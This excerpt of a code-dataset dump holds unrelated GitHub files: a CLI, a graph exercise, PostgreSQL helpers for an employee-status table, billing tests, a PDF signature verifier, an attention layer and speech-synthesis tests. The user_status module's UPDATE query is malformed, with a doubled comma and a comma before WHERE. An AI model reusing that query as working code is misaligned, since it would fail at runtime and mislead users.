REST API server certificate.\"\n \" Can be read from uploadcare.ini\"\n \" and ~/.uploadcare config files.\",\n )\n parser.add_argument(\n \"--api_version\",\n help=\"API version, can be read from uploadcare.ini\"\n \" and ~/.uploadcare config files.\"\n \" Default value is {0}\".format(conf.api_version),\n )\n\n return parser\n\n\ndef main( # noqa: C901\n arg_namespace=None, config_file_names=(\"~/.uploadcare\", \"uploadcare.ini\")\n):\n if arg_namespace is None:\n arg_namespace = ucare_argparser().parse_args()\n\n conf = load_config(arg_namespace, config_file_names)\n\n client = Uploadcare(**conf)\n\n if hasattr(arg_namespace, \"func\"):\n try:\n arg_namespace.func(arg_namespace, client)\n except UploadcareException as exc:\n pprint(\"ERROR: {0}\".format(exc))\n\n\nif __name__ == \"__main__\":\n ch = logging.StreamHandler()\n fmt = logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\n ch.setFormatter(fmt)\n logger.addHandler(ch)\n logger.setLevel(logging.INFO)\n\n main()\n","repo_name":"uploadcare/pyuploadcare","sub_path":"pyuploadcare/ucare_cli/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"66"} +{"seq_id":"9834934889","text":"\r\nclass Graph:\r\n def __init__(self,nVertices):\r\n self.nVertices = nVertices\r\n self.adjMatrix = [[0 for i in range(nVertices)]for j in range(nVertices)]\r\n\r\n def addEdge(self,v1,v2):\r\n self.adjMatrix[v1][v2] = 1\r\n self.adjMatrix[v2][v1] = 1\r\n\r\n def removeEdge(self,v1,v2):\r\n if self.containsEdge(v1,v2) is False:\r\n return 'Edge is absent'\r\n self.adjMatrix[v1][v2] = 0\r\n self.adjMatrix[v2][v1] = 0\r\n return 'removed'\r\n\r\n def containsEdge(self,v1,v2):\r\n return True if self.adjMatrix[v1][v2] > 0 else False\r\n\r\n def BFS(self):\r\n import queue\r\n q = queue.Queue()\r\n\r\n q.put(0)\r\n visited = [False]*self.nVertices\r\n visited[0] = True\r\n\r\n while q.empty() is False:\r\n sv = q.get()\r\n print(sv,end=' ')\r\n for i in range(self.nVertices):\r\n if self.containsEdge(sv,i) > 0 and visited[i] is False:\r\n q.put(i)\r\n visited[i] = True\r\n\r\n return\r\n\r\n def takeinputGraph(self,E):\r\n\r\n for i in range(E):\r\n l = [int(ele) for ele in input().split()]\r\n i = 0\r\n j = 1\r\n if len(l) <= 1:\r\n break\r\n g.addEdge(l[i],l[j])\r\n\r\ninputlist = [int(ele) for ele in input().split()]\r\nV,E = inputlist[0],inputlist[1]\r\n\r\ng = Graph(V)\r\ng.takeinputGraph(E)\r\ng.BFS()\r\n\r\n\r\n'''g = Graph(7)\r\ng.addEdge(0,1)\r\ng.addEdge(0,2)\r\ng.addEdge(1,3)\r\ng.addEdge(1,4)\r\ng.addEdge(2,6)\r\ng.addEdge(4,5)\r\ng.addEdge(5,6)\r\n'''\r\n","repo_name":"Jashwanth-k/Data-Structures-and-Algorithms","sub_path":"11. Graphs/BFS code .py","file_name":"BFS code .py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15813720820","text":"#!/usr/bin/python\nimport azure.functions as func\nimport psycopg2\nfrom datetime import datetime, date\nimport logging\nimport os\n\n\n# DB Queries\n# GET data\nGET_ALL_USER_STATUS = \"SELECT * FROM user_status LIMIT %s OFFSET %s;\"\nGET_ALL_USER_STATUS_WITH_MANAGER = \"\"\"\nSELECT \nus.user_status_id,\nus.domain_rhonda_id, \nCONCAT_WS(' ',u.first_name, u.last_name) AS employee, \nCONCAT_WS(' ', u2.first_name, u2.last_name) AS manager,\nus.status, \nus.employee_environment, \nus.department, \nus.work_type, \nus.work_location, \nus.gender, \nus.birth_date, \nus.start_date, \nus.end_date \nFROM user_status us \nLEFT JOIN public.user u\nON us.domain_rhonda_id = u.domain_rhonda_id\nLEFT JOIN public.user u2\nON us.manager_id = u2.domain_rhonda_id\nLEFT JOIN user_info ui \nON us.manager_id = ui.domain_rhonda_id \nWHERE us.status LIKE %s and us.employee_environment LIKE %s\nLIMIT %s OFFSET %s;\"\"\"\nGET_USER_STATUS_BY_DOMAIN_RHONDA_ID = \"\"\"SELECT * FROM user_status\nWHERE user_status.domain_rhonda_id = %s;\"\"\"\nCOUNT_USER_STATUS_ROWS = \"SELECT COUNT(*) FROM user_status;\"\n\n# INSERT data\nINSERT_USER_STATUS = \"\"\"INSERT INTO user_status (domain_rhonda_id, status, employee_environment, department, work_type, manager_id, work_location, gender, birth_date, start_date, end_date)\nVALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s) ON CONFLICT (domain_rhonda_id) DO NOTHING\nRETURNING domain_rhonda_id;\"\"\"\n\n# UPDATE data\n# Need COALESCE() function here for only updating the distinc value of column that already have value existed\n# Example: column = COALESCE(%s,column) \nUPDATE_USER_STATUS = \"\"\"UPDATE user_status\nSET status = COALESCE(%s,status),,\nemployee_environment = COALESCE(%s,employee_environment),\ndepartment = COALESCE(%s,department),\nwork_type = COALESCE(%s,work_type),\nmanager_id = COALESCE(%s,manager_id),\nwork_location = COALESCE(%s,work_location),\ngender = COALESCE(%s,gender),\nbirth_date = COALESCE(%s,birth_date),\nstart_date = COALESCE(%s,start_date),\nend_date = COALESCE(%s,end_date),\nWHERE domain_rhonda_id = %s\nRETURNING domain_rhonda_id;\n\"\"\"\n\n# DELETE data\nDELETE_USER_STATUS = \"\"\"DELETE FROM user_status\nWHERE domain_rhonda_id = %s\nRETURNING domain_rhonda_id;\n\"\"\"\n\n\n# DB Connection\ndef connection():\n \"\"\"Connect to the PostgreSQL database server\"\"\"\n try:\n\n HOST = os.environ[\"RP_HOST\"]\n DATABASE = os.environ[\"RP_DATABASE\"]\n USERNAME = os.environ[\"RP_USERNAME\"]\n PASSWORD = os.environ[\"RP_PASSWORD\"]\n\n conn = psycopg2.connect(host=HOST, database=DATABASE, user=USERNAME, password=PASSWORD)\n return conn\n\n except (Exception, psycopg2.DatabaseError) as error:\n logging.error(\"DB Connection Exception:\")\n logging.error(error)\n return None\n\n\nconnection = connection()\n\n# Functions\n\n\ndef date_converter(obj):\n \"\"\"Transform date to str. If there is no date it will return 1900-01-01\n\n Args:\n obj ([date]): date\n\n Returns:\n [str]: date as string\n \"\"\"\n if isinstance(obj, date):\n return obj.strftime(\"%Y-%m-%d\")\n return \"1900-01-01\"\n\n\ndef datetime_converter(obj):\n \"\"\"Transform datetime to str. If there is no date it will return 1900-01-01T00:00:00\n\n Args:\n obj ([datetime]): datetime\n\n Returns:\n [str]: datetime as string\n \"\"\"\n if isinstance(obj, datetime):\n return obj.strftime(\"%Y-%m-%dT%H:%M:%S\")\n return \"1900-01-01T00:00:00\"\n\n\ndef get_all_user_status(page_size, page):\n \"\"\"This function will return data from user_status table.\n Size will be defined by page_size and it will depen on page number.\n\n Returns:\n [list]: user_status data depending on page and page_size.\n \"\"\"\n try:\n user_status_data = []\n\n page = int(page) - 1\n offset = int(page_size) * int(page)\n\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(GET_ALL_USER_STATUS, (page_size, offset))\n results = cursor.fetchall()\n if not results:\n logging.info(f\"message: There is no results for all users status.\")\n return {}\n for row in results:\n user_status = {\n \"user_status_id\": row[0],\n \"domain_rhonda_id\": row[1],\n \"status\": row[2],\n \"employee_environment\": row[3],\n \"department\": row[4],\n \"work_type\": row[5],\n \"manager_id\": row[6],\n \"work_location\": row[7],\n \"gender\": row[8],\n \"birth_date\": date_converter(row[9]),\n \"start_date\": date_converter(row[10]),\n \"end_date\": date_converter(row[11]),\n \"created_at\": datetime_converter(row[12]),\n \"updated_at\": datetime_converter(row[13]),\n }\n user_status_data.append(user_status)\n return user_status_data\n except Exception as error:\n logging.error(\"Error: SELECT all user_status exception!\")\n logging.error(error)\n logging.error(\"Error: SELECT all user_status exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef get_user_status_by_domain_rhonda_id(domain_rhonda_id):\n \"\"\"This function will return all data from user_status table filtered by domain_rhonda_id.\n\n Returns:\n [list]: All user_status data filtered by domain_rhonda_id.\n \"\"\"\n try:\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(GET_USER_STATUS_BY_DOMAIN_RHONDA_ID, (domain_rhonda_id,))\n results = cursor.fetchall()\n if not results:\n logging.info(f\"message: There is no result for domain_rhonda_id: {domain_rhonda_id}\")\n return {}\n for row in results:\n user_status = {\n \"user_status_id\": row[0],\n \"domain_rhonda_id\": row[1],\n \"status\": row[2],\n \"employee_environment\": row[3],\n \"department\": row[4],\n \"work_type\": row[5],\n \"manager_id\": row[6],\n \"work_location\": row[7],\n \"gender\": row[8],\n \"birth_date\": date_converter(row[9]),\n \"start_date\": date_converter(row[10]),\n \"end_date\": date_converter(row[11]),\n \"created_at\": datetime_converter(row[12]),\n \"updated_at\": datetime_converter(row[13]),\n }\n return user_status\n except Exception as error:\n logging.error(\"Error: SELECT user_status by domain_rhonda_id exception!\")\n logging.error(error)\n logging.error(\"Error: SELECT user_status by domain_rhonda_id exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef get_all_user_status_with_manager(status_param, employee_environment_param, page_size, page):\n \"\"\"This function will return data from user_status table with manager name.\n Size will be defined by page_size and it will depen on page number.\n\n Returns:\n [list]: user_status data depending on page and page_size.\n \"\"\"\n try:\n user_status_manager_data = []\n\n page = int(page) - 1\n offset = int(page_size) * int(page)\n\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(\n GET_ALL_USER_STATUS_WITH_MANAGER, (status_param, employee_environment_param, page_size, offset)\n )\n results = cursor.fetchall()\n if not results:\n logging.info(f\"message: There is no results for all users status with manager.\")\n return {}\n for row in results:\n user_status_with_manager = {\n \"user_status_id\": row[0],\n \"domain_rhonda_id\": row[1],\n \"employee\": row[2],\n \"manager\": row[3],\n \"status\": row[4],\n \"employee_environment\": row[5],\n \"department\": row[6],\n \"work_type\": row[7],\n \"work_location\": row[8],\n \"gender\": row[9],\n \"birth_date\": date_converter(row[10]),\n \"start_date\": date_converter(row[11]),\n \"end_date\": date_converter(row[12]),\n }\n user_status_manager_data.append(user_status_with_manager)\n return user_status_manager_data\n except Exception as error:\n logging.error(\"Error: SELECT all user_status with manager exception!\")\n logging.error(error)\n logging.error(\"Error: SELECT all user_status with manager exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef add_user_status(\n domain_rhonda_id,\n status,\n employee_environment,\n department,\n work_type,\n manager_id,\n work_location,\n gender,\n birth_date,\n start_date,\n end_date,\n):\n \"\"\"This function will insert new data in user_status table in DB if not already exists. If alredy exists it won't do anything.\n\n Args:\n domain_rhonda_id ([str]): unique domain_rhonda_id\n status ([str]): It can be only Active or Termiated\n employee_environment ([str]): It can be only Internal, External or Other(defualt).\n department ([str]): Any string value, it can be null\n work_type ([str]): It can be only Permanent(default), Temporary or Contract.\n manager_id([str]): It can be null. This is domain_rhonda_id.\n work_location ([str]): It can null but only be Canada, USA or EU.\n gender ([str]): It can be null but only Male, Female or Intersex.\n birth_date ([str]): \"YYYY-MM-DD\" format, it can be null\n start_date ([str]): \"YYYY-MM-DD\" format, it can be null\n end_date ([str]): \"YYYY-MM-DD\" format, it can be null\n \"\"\"\n try:\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(\n INSERT_USER_STATUS,\n (\n domain_rhonda_id,\n status,\n employee_environment,\n department,\n work_type,\n manager_id,\n work_location,\n gender,\n birth_date,\n start_date,\n end_date,\n ),\n )\n return f\"{cursor.fetchone()[0]} has been added successfully!\"\n except Exception as error:\n logging.error(\"Error: INSERT user_status exception!\")\n logging.error(error)\n logging.error(\"Error: INSERT user_status exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef update_user_status(\n status,\n employee_environment,\n department,\n work_type,\n manager_id,\n work_location,\n gender,\n birth_date,\n start_date,\n end_date,\n domain_rhonda_id,\n):\n \"\"\"This function will update data in user_status table in DB by domain_rhonda_id.\n\n Args:\n domain_rhonda_id ([str]): unique domain_rhonda_id\n status ([str]): It can be only Active or Termiated\n employee_environment ([str]): It can be only Internal, External or Other(defualt).\n department ([str]): Any string value, it can be null\n work_type ([str]): It can be only Permanent(default), Temporary or Contract.\n manager_id([str]): It can be null. This is domain_rhonda_id.\n work_location ([str]): It can null but only be Canada, USA or EU.\n gender ([str]): It can be null but only Male, Female or Intersex.\n birth_date ([str]): \"YYYY-MM-DD\" format, it can be null\n start_date ([str]): \"YYYY-MM-DD\" format, it can be null\n end_date ([str]): \"YYYY-MM-DD\" format, it can be null\n \"\"\"\n try:\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(\n UPDATE_USER_STATUS,\n (\n status,\n employee_environment,\n department,\n work_type,\n manager_id,\n work_location,\n gender,\n birth_date,\n start_date,\n end_date,\n domain_rhonda_id,\n ),\n )\n\n return f\"{cursor.fetchone()[0]} has been updated successfully!\"\n except Exception as error:\n logging.error(\"Error: UPDATE user_status exception!\")\n logging.error(error)\n logging.error(\"Error: UPDATE user_status exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef count_user_status_rows():\n \"\"\"Count rows in DB.\n\n Returns:\n [int]: Number of rows in db.\n \"\"\"\n try:\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(COUNT_USER_STATUS_ROWS)\n return cursor.fetchall()[0][0]\n except Exception as error:\n logging.error(\"Error: count_user_status_rows exception!\")\n logging.error(error)\n logging.error(\"Error: count_user_status_rows exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef user_status_max_page(page_size):\n \"\"\"Depending on page_size we will get number of pages.\n\n Args:\n page_size ([int]): Number of rows per page.\n\n Returns:\n [int]: Number of pages\n \"\"\"\n try:\n total_rows = int(count_user_status_rows())\n if total_rows % int(page_size) != 0:\n max_page = int(total_rows / int(page_size)) + 1\n else:\n max_page = int(total_rows / int(page_size))\n\n return max_page\n except Exception as error:\n logging.error(\"Error: user_status_max_page exception!\")\n logging.error(error)\n logging.error(\"Error: user_status_max_page exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef delete_user_status(domain_rhonda_id):\n \"\"\"This will delete user_status by domain_rhonda_id\n\n Args:\n domain_rhonda_id ([str]): domain_rhonda_id\n\n Returns:\n [str]: domain_rhonda_id that has been deleted.\n \"\"\"\n try:\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(DELETE_USER_STATUS, (domain_rhonda_id,))\n print(f\"Delete cursor: {cursor.fetchone()[0]}\")\n except Exception as error:\n logging.error(\"Error: DELETE user_status by domain_rhonda_id exception!\")\n logging.error(error)\n logging.error(\"Error: DELETE user_status by domain_rhonda_id exception end\")\n return func.HttpResponse(f\"{error}\")\n","repo_name":"Monbert/API_template","sub_path":"user_status/user_status_functions.py","file_name":"user_status_functions.py","file_ext":"py","file_size_in_byte":15140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33606201272","text":"import datetime as dt\n\nimport psycopg2\nimport pytest\n\n\nfrom tests_billing_subventions_x import dbhelpers\nfrom tests_billing_subventions_x import types\n\nINTERNAL_DRAFT_ID = 'e12d920f0a0839f3743b38ffe28747cd'\nSUBDRAFTS = {'from': '1', 'to': '1'}\nRULE_ID = 'c64b2937-e5c3-4b61-a1e4-3aef0c76d134'\n\nMOCK_NOW = '2022-07-05T18:12:34.567890+03:00'\n\n\n@pytest.mark.now(MOCK_NOW)\nasync def test_stq_approve_rules_rescheduled_when_draft_not_ready(\n stq_runner, stq, with_draft,\n):\n with_draft(draft_id=None)\n await _run(stq_runner)\n queue = stq.billing_subventions_x_approve_rules\n assert queue.times_called == 1\n task = queue.next_call()\n assert task['id'] == 'id'\n eta = dt.datetime.fromisoformat(MOCK_NOW) + dt.timedelta(seconds=10)\n assert task['eta'] == eta.astimezone(dt.timezone.utc).replace(tzinfo=None)\n\n\n@pytest.mark.now(MOCK_NOW)\n@pytest.mark.config(\n BILLING_SUBVENTIONS_BULK_DRAFTS_CONTROL={'approve_max_reschedules': 2},\n)\nasync def test_stq_approve_rules_stops_when_rescheduling_limit_reached(\n stq_runner, stq, with_draft,\n):\n with_draft(draft_id=None)\n await _run(stq_runner, reschedule_counter=2)\n assert stq.billing_subventions_x_approve_rules.times_called == 0\n\n\n@pytest.mark.now(MOCK_NOW)\nasync def test_stq_approve_rules_splits_draft_to_chunks(\n stq_runner, stq, with_draft,\n):\n with_draft()\n await _run(stq_runner)\n queue = stq.billing_subventions_x_approve_rules\n assert queue.times_called == 1\n task = queue.next_call()\n assert task['id'] == f'{INTERNAL_DRAFT_ID}:1-1'\n assert task['kwargs']['internal_draft_id'] == INTERNAL_DRAFT_ID\n assert task['kwargs']['subdrafts'] == SUBDRAFTS\n eta = dt.datetime.fromisoformat(MOCK_NOW) + dt.timedelta(seconds=30)\n assert task['eta'] == eta.astimezone(dt.timezone.utc).replace(tzinfo=None)\n\n\nasync def test_stq_approve_rules_creates_consistent_rules(\n stq_runner, pgsql, with_draft, mark_as_applying,\n):\n draft = with_draft()\n mark_as_applying(draft['internal_draft_id'], 'draft_id', 'budget_id')\n await _run(stq_runner, subdrafts=SUBDRAFTS)\n rule = dbhelpers.get_rule_by_id(pgsql, RULE_ID)\n rule.pop('updated_at')\n assert rule == {\n 'branding': 'sticker',\n 'budget_id': 'budget_id',\n 'counters_mapping': [{'global': 'draft_id:A', 'local': 'A'}],\n 'currency': 'RUB',\n 'draft_id': 'draft_id',\n 'ends_at': dt.datetime.fromisoformat('2021-06-01T00:00:00+03:00'),\n 'geoarea': 'pol-1',\n 'min_activity_points': 75,\n 'rates': {\n 'schedule': [\n {'counter': 'A', 'start': '00:00', 'week_day': 'mon'},\n ],\n 'steps': [{'id': 'A', 'steps': [{'amount': '100', 'nrides': 10}]}],\n },\n 'id': RULE_ID,\n 'type': 'goal',\n 'schedule_ref': 'schedule_ref_000001',\n 'starts_at': dt.datetime.fromisoformat('2021-05-01T00:00:00+03:00'),\n 'tag': 'a_tag',\n 'stop_tag': None,\n 'tariff': 'comfort',\n 'zone': 'g1',\n 'unique_driver_id': '511476f9-e08a-4826-b925-162578f12ab1',\n 'window_size': 7,\n }\n _assert_schedule_for_rule(pgsql, RULE_ID)\n\n\nasync def test_stq_approve_rules_run_twice(\n stq_runner, pgsql, with_draft, mark_as_applying,\n):\n draft = with_draft()\n mark_as_applying(draft['internal_draft_id'], 'draft_id', 'budget_id')\n await _run(stq_runner, subdrafts=SUBDRAFTS)\n await _run(stq_runner, subdrafts=SUBDRAFTS)\n _assert_schedule_for_rule(pgsql, RULE_ID)\n\n\ndef _assert_schedule_for_rule(pgsql, rule_id):\n schedule = dbhelpers.get_schedule_by_id(pgsql, rule_id)\n assert schedule == [\n types.ScheduleRange(\n during=psycopg2.extras.NumericRange(0, 10080, '[)'), value='A',\n ),\n ]\n\n\nasync def _run(stq_runner, **kwargs):\n kwargs.setdefault('internal_draft_id', INTERNAL_DRAFT_ID)\n await stq_runner.billing_subventions_x_approve_rules.call(\n task_id='id',\n reschedule_counter=kwargs.pop('reschedule_counter', 0),\n kwargs=kwargs,\n )\n\n\n@pytest.fixture(name='with_draft')\ndef _make_draft(create_drafts, a_draft, a_subdraft, a_goal, load_json):\n def _builder(*, draft_id='draft_id'):\n spec = load_json('bulk_personal_goals_spec1.json')\n draft = a_draft(\n internal_draft_id=INTERNAL_DRAFT_ID,\n draft_id=draft_id,\n spec={},\n subdrafts=[a_subdraft(spec_ref='1', spec=spec, is_completed=True)],\n rules=[\n a_goal(\n id=RULE_ID,\n geonode=spec['zones'][0],\n tariff_class=spec['tariff_classes'][0],\n start=spec['rule']['start'],\n end=spec['rule']['end'],\n counters=spec['rule']['counters'],\n tag=spec['rule']['tag'],\n geoarea=spec['geoareas'][0],\n branding=spec['rule']['branding_type'],\n points=spec['rule']['activity_points'],\n currency=spec['rule']['currency'],\n window_size=spec['rule']['window'],\n unique_driver_id=spec['rule']['unique_driver_id'],\n schedule_ref='schedule_ref_000001',\n ),\n ],\n schedule_spec=[\n {\n 'schedule_ref': 'schedule_ref_000001',\n 'during': psycopg2.extras.NumericRange(0, 10080, '[)'),\n 'value': 'A',\n },\n ],\n )\n create_drafts(draft)\n return draft\n\n return _builder\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_billing_subventions_x/test_stq_approve_rules.py","file_name":"test_stq_approve_rules.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5861514370","text":"\"\"\"\nThis code reads a PDF, and either verifies or falsifies it as an ordinance\nissued by the Chancellor.\n\"\"\"\n\n# Standard imports.\nfrom dataclasses import dataclass\n\n# Non-standard imports.\nfrom pdfrw import PdfReader\n\n# Local imports.\nfrom .configs import DEFAULT_PATH_TO_PUBLIC_KEY\nfrom .digistamp import Verifier\nfrom .ordinance import Ordinance\nfrom .utils import get_hash_of_ordinance\n\n##############\n# MAIN CLASS #\n##############\n\n@dataclass\nclass PDFVerifier:\n \"\"\" The class in question. \"\"\"\n # Object attributes.\n path_to_pdf: str = None\n path_to_public_key: str = DEFAULT_PATH_TO_PUBLIC_KEY\n trailer: PdfReader = None\n verifier: Verifier = None\n ordinance: Ordinance = None\n hash: str = None\n stamp: str = None\n last_exception: Exception = None\n debug: bool = True\n\n def __post_init__(self):\n self.trailer = PdfReader(self.path_to_pdf)\n self.verifier = Verifier(path_to_public_key=self.path_to_public_key)\n\n def load_ordinance(self):\n \"\"\" Load the ordinance's data from the trailer. \"\"\"\n self.ordinance = Ordinance()\n self.ordinance.load_from_trailer(self.trailer)\n\n def load_hash(self):\n \"\"\" Load the hash from the trailer. \"\"\"\n if not self.trailer.Info.hash:\n raise PDFVerifierError(\"Missing hash.\")\n my_buffer = self.trailer.Info.hash\n self.hash = my_buffer[1:-1]\n\n def load_stamp(self):\n \"\"\" Load the stamp from the trailer. \"\"\"\n if not self.trailer.Info.stamp:\n raise PDFVerifierError(\"Missing stamp.\")\n my_buffer = self.trailer.Info.stamp\n self.stamp = my_buffer[1:-1]\n\n def check_hash(self):\n \"\"\" Check that the hash is what it's supposed to be, given the\n ordinance's data. \"\"\"\n intended_hash = get_hash_of_ordinance(self.ordinance)\n if self.hash != intended_hash:\n raise PDFVerifierError(\"Failed to verify hash.\")\n\n def check_stamp(self):\n \"\"\" Verify the stamp against the hash. \"\"\"\n if not self.verifier.verify(self.hash, self.stamp):\n raise PDFVerifierError(\"Failed to verify stamp.\")\n\n def verify(self):\n \"\"\" Carry out all the checks. \"\"\"\n try:\n self.load_ordinance()\n self.load_hash()\n self.load_stamp()\n self.check_hash()\n self.check_stamp()\n except PDFVerifierError as my_exception:\n self.last_exception = my_exception\n if self.debug:\n print(my_exception)\n return False\n return True\n\n################\n# HELPER CLASS #\n################\n\nclass PDFVerifierError(Exception):\n \"\"\" A custom exception. \"\"\"\n","repo_name":"tomhosker/chancery_b","sub_path":"source/pdf_verifier.py","file_name":"pdf_verifier.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41376806960","text":"class Solution:\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if str(x) == str(x)[::-1]:\n return True\n return False\n\ndef main():\n import sys\n import io\n def readlines():\n for line in io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8'):\n yield line.strip('\\n')\n\n lines = readlines()\n while True:\n try:\n line = next(lines)\n x = int(line);\n \n ret = Solution().isPalindrome(x)\n\n out = (ret);\n print(out)\n except StopIteration:\n break\n\nif __name__ == '__main__':\n main()\n","repo_name":"ms-darshan/Competative-Programming","sub_path":"palindromeNumbr.py","file_name":"palindromeNumbr.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17629309422","text":"#!/usr/bin/env python3\n\"\"\"Multi Head Attentionr\"\"\"\n\n\nimport tensorflow as tf\nsdp_attention = __import__('5-sdp_attention').sdp_attention\n\n\nclass MultiHeadAttention(tf.keras.layers.Layer):\n \"\"\"Calculate multi-head attention for a transformer\"\"\"\n\n def __init__(self, dm, h):\n \"\"\"Constructor\n Args:\n dm is an integer representing the dimensionality of the model\n h is an integer representing the number of heads\n public instance attributes\n h - the number of heads\n dm - the dimensionality of the model\n depth - the depth of each attention head\n Wq - a Dense layer with dm units, used to generate the query matrix\n Wk - a Dense layer with dm units, used to generate the key matrix\n Wv - a Dense layer with dm units, used to generate the value matrix\n linear - a Dense layer with dm units, used to generate the\n attention output\n \"\"\"\n super(MultiHeadAttention, self).__init__()\n self.h = h\n self.dm = dm\n self.depth = dm // self.h\n self.Wq = tf.keras.layers.Dense(dm)\n self.Wk = tf.keras.layers.Dense(dm)\n self.Wv = tf.keras.layers.Dense(dm)\n self.linear = tf.keras.layers.Dense(dm)\n\n def split_heads(self, x, batches):\n \"\"\"Split the last dimension into (num_heads, depth).\n \"\"\"\n rb = tf.reshape(x, (batches, -1, self.h, self.depth))\n return tf.transpose(rb, perm=[0, 2, 1, 3])\n\n def call(self, Q, K, V, mask):\n \"\"\"Keras layer call\"\"\"\n batch_size = tf.shape(Q)[0]\n\n Q = self.Wq(Q)\n K = self.Wk(K)\n V = self.Wv(V)\n\n Q = self.split_heads(Q, batch_size)\n K = self.split_heads(K, batch_size)\n V = self.split_heads(V, batch_size)\n\n scaled_attention, weights = sdp_attention(Q, K, V, mask)\n\n scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3])\n\n concat_attention = tf.reshape(scaled_attention,\n (batch_size, -1, self.dm))\n\n return self.linear(tf.reshape(scaled_attention,\n (batch_size, -1, self.dm))), weights\n","repo_name":"s0m35h1t/holbertonschool-machine_learning","sub_path":"supervised_learning/0x11-attention/6-multihead_attention.py","file_name":"6-multihead_attention.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24390834310","text":"import sys\n\n\nPY2 = sys.version_info[0] == 2\n\n\nif PY2:\n text_type = unicode\n binary_type = str\n string_types = basestring,\n unicode = unicode\n basestring = basestring\nelse:\n text_type = str\n binary_type = bytes\n string_types = str,\n unicode = str\n basestring = (str, bytes)\n","repo_name":"vitalk/flask-styleguide-example","sub_path":"app/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"28640942713","text":"import unittest\nimport logging\nfrom io import StringIO, BytesIO\nimport wave\n\nfrom espeakng import ESpeakNG\n\nG2P_TESTS = [\n (u\"GELBSEIDENEN\", u\"dZ'ElbseId,En@n\", u\"d͡ʒˈɛlbse͡ɪdˌɛnən\"),\n (u\"UNMUTE\", u\"Vnmj'u:t\", u\"ʌnmjˈuːt\"),\n (u\"GESCHIRRSCHEUERN\", u\"dZ'Esk3r-@Sj,u:3n\", u\"d͡ʒˈɛskɚɹəʃjˌuːɚn\"),\n (u\"DÜSTRE\", u\"d'u:st3\", u\"dˈuːstɚ\"),\n (u\"EINGANGE\", u\"'aINgandZ\", u\"ˈa͡ɪŋɡænd͡ʒ\"),\n (u\"AUSSCHLÄGEN\", u\"'O:SlEdZ@n\", u\"ˈɔːʃlɛd͡ʒən\"),\n (u\"NACHHÄNGEND\", u\"n'atSh@ndZ,End\", u\"nˈæt͡ʃhənd͡ʒˌɛnd\"),\n (u\"HAUPTSTRAßEN\", u\"h'O:ptst3r- 'as 'En\", u\"hˈɔːptstɚɹ ˈæs ˈɛn\"),\n (u\"HOCHWEISEN\", u\"h'0tSwaIz@n\", u\"hˈɑːt͡ʃwa͡ɪzən\"),\n (u\"DICKER\", u\"d'Ik3\", u\"dˈɪkɚ\"),\n ]\n\nclass TestESpeakNG (unittest.TestCase):\n\n def test_say_unkown_voice(self):\n\n esng = ESpeakNG(voice='unknown-voice')\n esng.pitch = 32\n esng.speed = 150\n res = esng.say('Hello World!', sync=True)\n\n self.assertNotEqual (res, [])\n\n\n def test_say_en(self):\n\n esng = ESpeakNG(voice='english-us')\n esng.pitch = 32\n esng.speed = 150\n res = esng.say('Hello World!', sync=True)\n\n self.assertEqual (res, [])\n\n def test_say_de(self):\n\n esng = ESpeakNG(voice='german')\n esng.pitch = 32\n esng.speed = 150\n esng.say('Wie geht es Dir?', sync=True)\n\n def test_voices(self):\n esng = ESpeakNG()\n\n voices = esng.voices\n self.assertGreater (len(voices), 10)\n\n def test_synth_wav(self):\n\n esng = ESpeakNG(voice='english-us')\n esng.pitch = 32\n esng.speed = 150\n wavs = esng.synth_wav('Hello World!')\n wav = wave.open(BytesIO(wavs))\n \n self.assertEqual (wav.getnchannels(), 1)\n self.assertEqual (wav.getframerate(), 22050)\n self.assertGreater (wav.getnframes(), 24000)\n\n def test_synth_wav_xsampa(self):\n\n esng = ESpeakNG(voice='english-us')\n esng.pitch = 32\n esng.speed = 150\n wavs = esng.synth_wav(\"h@l'oU\", fmt='xs')\n wav = wave.open(BytesIO(wavs))\n \n self.assertEqual (wav.getnchannels(), 1)\n self.assertEqual (wav.getframerate(), 22050)\n self.assertGreater (wav.getnframes(), 20000)\n\n def test_g2p(self):\n esng = ESpeakNG(voice='english-us')\n\n for g, xs_t, ipa_t in G2P_TESTS:\n\n xs = esng.g2p (g)\n self.assertEqual(xs, xs_t)\n\n ipa = esng.g2p (g, ipa=2)\n self.assertEqual(ipa, ipa_t)\n\nif __name__ == \"__main__\":\n\n logging.basicConfig(level=logging.ERROR)\n # 